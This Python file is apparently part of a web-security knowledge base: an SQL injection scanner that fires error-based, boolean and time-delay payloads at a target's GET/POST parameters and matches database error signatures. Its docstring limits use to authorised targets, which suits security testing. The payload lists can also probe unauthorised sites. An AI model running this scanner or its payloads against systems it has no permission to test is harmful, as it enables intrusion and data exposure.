文件
websafe-kb/01-sql-injection/tools/sqli-scanner.py

369 行
12 KiB
Python

#!/usr/bin/env python3
"""
SQL Injection Scanner
自动检测SQL注入漏洞点
支持:
- GET/POST 参数注入
- Cookie 透传 (Cookie 随每个请求原样发送, 目前不作为注入点测试)
- Header 注入 (尚未实现)
- 时间盲注检测
- 布尔盲注检测
- 报错注入检测
Usage:
python3 sqli-scanner.py -u "http://target.com/page?id=1"
python3 sqli-scanner.py -u "http://target.com" --data "id=1&name=test"
python3 sqli-scanner.py -u "http://target.com" --cookie "id=1"
授权边界:
- 仅用于自有资产、测试环境或已明确授权的目标
- 允许公网验证,但必须确认资产归属或授权关系
- 不面向无授权第三方网站或泛互联网扫描
"""
import argparse
import requests
import re
import time
import urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Dict, Tuple, Optional
import sys
class Colors:
    """ANSI escape sequences used to colorize terminal output."""

    # Foreground colors (bright variants).
    RED = "\033[91m"
    GREEN = "\033[92m"
    YELLOW = "\033[93m"
    BLUE = "\033[94m"

    # Text attributes: END resets all styling, BOLD switches on bold text.
    END = "\033[0m"
    BOLD = "\033[1m"
class SQLiScanner:
    """Heuristic SQL injection detector for HTTP request parameters.

    For each parameter the scanner replaces the value with a probe payload
    and looks for one of three signals: a database error message in the
    response (error-based), a difference between a "true" and a "false"
    condition (boolean-based), or an added response delay (time-based).

    Intended only for assets you own or are explicitly authorized to test.
    """

    # Extra seconds (over the baseline) a response must take to count as delayed.
    TIME_DELAY_THRESHOLD = 4.5
    # Timeout for timing probes; must be longer than the 5 s sleep in the payloads.
    TIME_PROBE_TIMEOUT = 15
    # Response-length difference (characters) treated as significant.
    ERROR_LENGTH_DELTA = 500
    BOOL_LENGTH_DELTA = 100

    def __init__(self, timeout: int = 10, threads: int = 5):
        """Create a scanner with its own HTTP session and payload tables.

        Args:
            timeout: Default per-request timeout in seconds.
            threads: Stored on the instance; scanning in this class is
                sequential and does not read it.
        """
        self.timeout = timeout
        self.threads = threads
        self.session = requests.Session()
        self.session.headers.update(
            {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
            }
        )
        # Regexes (matched case-insensitively) for database error messages.
        self.error_patterns = [
            r"SQL syntax.*MySQL",
            r"Warning.*mysql_.*",
            r"MySqlException",
            r"PostgreSQL.*ERROR",
            r"Warning.*pg_.*",
            r"Invalid query: pg_",
            r"ORA-\d{5}",
            r"Oracle.*Driver",
            r"Warning.*oci_.*",
            r"Microsoft SQL Server",
            r"ODBC SQL Server Driver",
            r"SQLite.*error",
            r"sqlite3.OperationalError",
            r"Syntax error.*SQLite",
            r"Warning.*sqlite_",
            r"DB2 SQL error",
            r"DB2 SQLSTATE",
            r"Dynamic SQL Error",
            r"Warning.*ibase_",
            r"PLS-\d{5}",
            r"Error.*SQL.*",
            r"Exception.*SQL",
            r"SQLSTATE\[\d+\]",
            r"mysql_fetch",
            r"mysql_num_rows",
            r"pg_query",
            r"mysql_query",
        ]
        # (payload, database label) pairs; every payload asks for a 5 s delay.
        self.time_payloads = [
            ("' AND SLEEP(5)-- -", "MySQL"),
            ("' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -", "MySQL"),
            ("'; WAITFOR DELAY '0:0:5'-- -", "MSSQL"),
            ("' AND 1=1; WAITFOR DELAY '0:0:5'-- -", "MSSQL"),
            ("' AND pg_sleep(5)-- -", "PostgreSQL"),
            ("' OR (SELECT pg_sleep(5))-- -", "PostgreSQL"),
            ("' AND (SELECT dbms_pipe.receive_message('a',5) FROM dual)-- -", "Oracle"),
            ("'||dbms_pipe.receive_message(chr(99),5)-- -", "Oracle"),
        ]
        # (true-condition payload, false-condition payload, description).
        self.bool_payloads = [
            ("' AND 1=1-- -", "' AND 1=2-- -", "Boolean-based"),
            ("' OR '1'='1", "' OR '1'='2", "Boolean-based"),
            ("1 AND 1=1", "1 AND 1=2", "Boolean-based (numeric)"),
            ("1 OR 1=1", "1 OR 1=2", "Boolean-based (numeric)"),
        ]
        # (payload, description) pairs meant to provoke a database error.
        self.error_payloads = [
            ("'", "Single quote"),
            ('"', "Double quote"),
            ("\\", "Backslash"),
            ("')", "Single quote parenthesis"),
            ('")', "Double quote parenthesis"),
            ("' OR 1=1-- -", "OR injection"),
            (
                "' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))-- -",
                "MSSQL error",
            ),
            (
                "' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))-- -",
                "MySQL error",
            ),
            ("' AND 1=CAST((SELECT version()) AS INT)-- -", "PostgreSQL error"),
        ]

    def print_result(self, level: str, msg: str):
        """Print ``msg`` prefixed with a colorized ``[level]`` tag."""
        colors = {
            "INFO": Colors.BLUE,
            "SUCCESS": Colors.GREEN,
            "WARNING": Colors.YELLOW,
            "ERROR": Colors.RED,
            "VULN": Colors.RED + Colors.BOLD,
        }
        print(f"{colors.get(level, '')}[{level}]{Colors.END} {msg}")

    @staticmethod
    def _merge_query(url: str, data: Optional[Dict]) -> str:
        """Return ``url`` with ``data`` merged into its query string.

        Query parameters already in ``url`` are kept unless ``data`` supplies
        the same name, in which case the value from ``data`` replaces them.
        Appending ``?...`` blindly would produce ``page?id=1?id=...`` for a
        URL that already carries a query string.
        """
        if not data:
            return url
        parts = urllib.parse.urlsplit(url)
        kept = [
            (name, value)
            for name, value in urllib.parse.parse_qsl(
                parts.query, keep_blank_values=True
            )
            if name not in data
        ]
        query = urllib.parse.urlencode(kept + list(data.items()))
        return urllib.parse.urlunsplit(parts._replace(query=query))

    @staticmethod
    def _discover_params(url: str, method: str, data: Optional[Dict]) -> List[str]:
        """List the parameter names that can be tested for a request.

        GET requests expose the URL query names plus any ``data`` keys
        (``data`` is sent in the query string for GET); other methods expose
        only the ``data`` keys. Order is preserved and duplicates are removed.
        """
        names: List[str] = []
        if method.upper() == "GET":
            query = urllib.parse.urlsplit(url).query
            # keep_blank_values so that "?id=" still yields the name "id".
            names.extend(
                name
                for name, _ in urllib.parse.parse_qsl(query, keep_blank_values=True)
            )
        names.extend(data or {})
        return list(dict.fromkeys(names))

    def test_error_based(
        self,
        url: str,
        param: str,
        method: str = "GET",
        data: Optional[Dict] = None,
        cookies: Optional[Dict] = None,
    ) -> Tuple[bool, Optional[str]]:
        """Probe ``param`` for error-based injection.

        Returns:
            ``(True, description)`` when a payload response contains a
            database error signature that the baseline response did not, or
            when its length differs from the baseline by more than
            ``ERROR_LENGTH_DELTA`` characters; otherwise ``(False, None)``.
        """
        baseline = self._request(url, method, data, cookies)
        # Compare against None: a Response is falsy for any 4xx/5xx status.
        if baseline is None:
            return False, None
        baseline_text = baseline.text
        baseline_len = len(baseline_text)
        # A signature already on the untouched page cannot be blamed on a payload.
        candidate_patterns = [
            pattern
            for pattern in self.error_patterns
            if not re.search(pattern, baseline_text, re.IGNORECASE)
        ]
        for payload, desc in self.error_payloads:
            test_data = data.copy() if data else {}
            test_data[param] = payload
            resp = self._request(url, method, test_data, cookies)
            # HTTP 500 pages are exactly where error text shows up, so only
            # skip when the request itself failed.
            if resp is None:
                continue
            body = resp.text
            for pattern in candidate_patterns:
                if re.search(pattern, body, re.IGNORECASE):
                    return (
                        True,
                        f"[报错注入] {param} - Payload: {payload} - 类型: {desc} - 匹配: {pattern}",
                    )
            delta = abs(len(body) - baseline_len)
            if delta > self.ERROR_LENGTH_DELTA:
                return (
                    True,
                    f"[报错注入] {param} - Payload: {payload} - 响应长度差异: {delta}",
                )
        return False, None

    def test_time_based(
        self,
        url: str,
        param: str,
        method: str = "GET",
        data: Optional[Dict] = None,
        cookies: Optional[Dict] = None,
    ) -> Tuple[bool, Optional[str]]:
        """Probe ``param`` for time-based blind injection.

        The unmodified request is timed first so that a slow endpoint is not
        mistaken for an injected delay.

        Returns:
            ``(True, description)`` when a payload response arrives at least
            ``TIME_DELAY_THRESHOLD`` seconds later than the baseline;
            otherwise ``(False, None)``.
        """
        started = time.monotonic()
        baseline = self._request(
            url, method, data, cookies, timeout=self.TIME_PROBE_TIMEOUT
        )
        baseline_elapsed = time.monotonic() - started
        if baseline is None:
            # The target did not answer, so no delay can be measured.
            return False, None
        for payload, db_type in self.time_payloads:
            test_data = data.copy() if data else {}
            test_data[param] = payload
            started = time.monotonic()
            resp = self._request(
                url, method, test_data, cookies, timeout=self.TIME_PROBE_TIMEOUT
            )
            elapsed = time.monotonic() - started
            # A timeout or connection error also takes long but proves nothing.
            if resp is None:
                continue
            if elapsed - baseline_elapsed >= self.TIME_DELAY_THRESHOLD:
                return (
                    True,
                    f"[时间盲注] {param} - Payload: {payload} - 数据库: {db_type} - 延迟: {elapsed:.2f}s",
                )
        return False, None

    def test_bool_based(
        self,
        url: str,
        param: str,
        method: str = "GET",
        data: Optional[Dict] = None,
        cookies: Optional[Dict] = None,
    ) -> Tuple[bool, Optional[str]]:
        """Probe ``param`` for boolean-based blind injection.

        Each payload pair is sent as a "true" and a "false" condition.

        Returns:
            ``(True, description)`` when the two response lengths differ by
            more than ``BOOL_LENGTH_DELTA`` characters, or when the "true"
            response contains a success keyword while the "false" response
            contains a failure keyword; otherwise ``(False, None)``.
        """
        for true_payload, false_payload, desc in self.bool_payloads:
            test_data_true = data.copy() if data else {}
            test_data_true[param] = true_payload
            test_data_false = data.copy() if data else {}
            test_data_false[param] = false_payload
            resp_true = self._request(url, method, test_data_true, cookies)
            resp_false = self._request(url, method, test_data_false, cookies)
            # Compare against None so that 4xx/5xx responses are still analysed.
            if resp_true is None or resp_false is None:
                continue
            diff = abs(len(resp_true.text) - len(resp_false.text))
            if diff > self.BOOL_LENGTH_DELTA:
                return (
                    True,
                    f"[布尔盲注] {param} - True: {true_payload} - False: {false_payload} - 长度差: {diff}",
                )
            true_text = resp_true.text.lower()
            false_text = resp_false.text.lower()
            looks_ok = any(
                word in true_text for word in ("success", "welcome", "admin")
            )
            looks_bad = any(
                word in false_text for word in ("error", "fail", "wrong")
            )
            if looks_ok and looks_bad:
                return True, f"[布尔盲注] {param} - 关键词差异检测到 - {desc}"
        return False, None

    def _request(
        self,
        url: str,
        method: str,
        data: Optional[Dict] = None,
        cookies: Optional[Dict] = None,
        timeout: Optional[int] = None,
    ) -> "Optional[requests.Response]":
        """Send one HTTP request through the shared session.

        ``GET`` (case-insensitive) merges ``data`` into the URL query string;
        any other method sends ``data`` as a POST body. TLS certificate
        verification is disabled (``verify=False``).

        Returns:
            The response, whatever its status code, or ``None`` when the
            request raised a ``requests`` exception (timeout, connection
            error, ...). Callers must test the result with ``is None``
            because a response with an error status is falsy.
        """
        effective_timeout = timeout or self.timeout
        try:
            if method.upper() == "GET":
                return self.session.get(
                    self._merge_query(url, data),
                    cookies=cookies,
                    timeout=effective_timeout,
                    verify=False,
                )
            return self.session.post(
                url,
                data=data,
                cookies=cookies,
                timeout=effective_timeout,
                verify=False,
            )
        except requests.exceptions.RequestException:
            return None

    def scan_url(
        self,
        url: str,
        method: str = "GET",
        data: Optional[Dict] = None,
        cookies: Optional[Dict] = None,
        params: Optional[List[str]] = None,
    ) -> List[str]:
        """Run the checks against every testable parameter of a request.

        Args:
            url: Target URL, optionally carrying a query string.
            method: HTTP method; ``GET`` is matched case-insensitively.
            data: Base parameters sent with every request.
            cookies: Cookies sent unchanged with every request.
            params: Names to test; discovered from ``url``/``data`` if empty.

        Returns:
            One description per parameter judged injectable. Checks run in
            the order error-based, boolean-based, time-based, and the first
            positive result ends the testing of that parameter.
        """
        results: List[str] = []
        if not params:
            params = self._discover_params(url, method, data)
        if not params:
            self.print_result("WARNING", "未找到可测试的参数")
            return results
        self.print_result("INFO", f"开始扫描 {len(params)} 个参数: {', '.join(params)}")
        checks = (self.test_error_based, self.test_bool_based, self.test_time_based)
        for param in params:
            self.print_result("INFO", f"测试参数: {param}")
            for check in checks:
                vuln, msg = check(url, param, method, data, cookies)
                if vuln:
                    results.append(msg)
                    self.print_result("VULN", msg)
                    break
        return results
def _parse_form_data(raw):
    """Decode an ``a=1&b=2`` string into a dict of form fields.

    Names and values are form-decoded, because ``requests`` encodes them
    again when sending; passing already-encoded text through unchanged would
    double-encode it. Pairs without ``=`` are ignored.
    """
    fields = {}
    for pair in (raw or "").split("&"):
        if "=" not in pair:
            continue
        name, value = pair.split("=", 1)
        fields[urllib.parse.unquote_plus(name)] = urllib.parse.unquote_plus(value)
    return fields


def _parse_cookie_header(raw):
    """Split a ``k=v; k2=v2`` cookie string into a dict; pairs without ``=`` are ignored."""
    jar = {}
    for pair in (raw or "").split(";"):
        if "=" not in pair:
            continue
        name, value = pair.strip().split("=", 1)
        jar[name] = value
    return jar


def main():
    """Command-line entry point: parse arguments, run the scan, print a summary."""
    parser = argparse.ArgumentParser(description="SQL Injection Scanner")
    parser.add_argument("-u", "--url", required=True, help="目标URL")
    parser.add_argument(
        "-m", "--method", default="GET", choices=["GET", "POST"], help="HTTP方法"
    )
    parser.add_argument("-d", "--data", help="POST数据 (格式: id=1&name=test)")
    parser.add_argument("-c", "--cookie", help="Cookie")
    parser.add_argument("-p", "--params", help="指定参数 (逗号分隔)")
    parser.add_argument("-t", "--threads", type=int, default=5, help="线程数")
    parser.add_argument("--timeout", type=int, default=10, help="超时时间")
    args = parser.parse_args()

    # Requests are sent with verify=False; silence only the warning that
    # causes instead of every urllib3 warning.
    urllib3 = requests.packages.urllib3
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    scanner = SQLiScanner(timeout=args.timeout, threads=args.threads)
    data = _parse_form_data(args.data)
    cookies = _parse_cookie_header(args.cookie)

    # Strip whitespace and drop empty entries so "-p 'id, name'" tests "name",
    # not " name"; an empty list falls back to automatic discovery.
    params = None
    if args.params:
        params = [name.strip() for name in args.params.split(",") if name.strip()]

    rule = f"{Colors.BOLD}{'=' * 60}{Colors.END}"
    print(f"\n{rule}")
    print(f"{Colors.BOLD}SQL Injection Scanner{Colors.END}")
    print(f"{rule}\n")
    scanner.print_result("INFO", f"目标: {args.url}")
    scanner.print_result("INFO", f"方法: {args.method}")

    results = scanner.scan_url(args.url, args.method, data, cookies, params)

    print(f"\n{rule}")
    if results:
        scanner.print_result("SUCCESS", f"发现 {len(results)} 个SQL注入漏洞!")
        for r in results:
            print(f" - {r}")
    else:
        scanner.print_result("INFO", "未发现SQL注入漏洞")
    print(f"{rule}\n")


if __name__ == "__main__":
    main()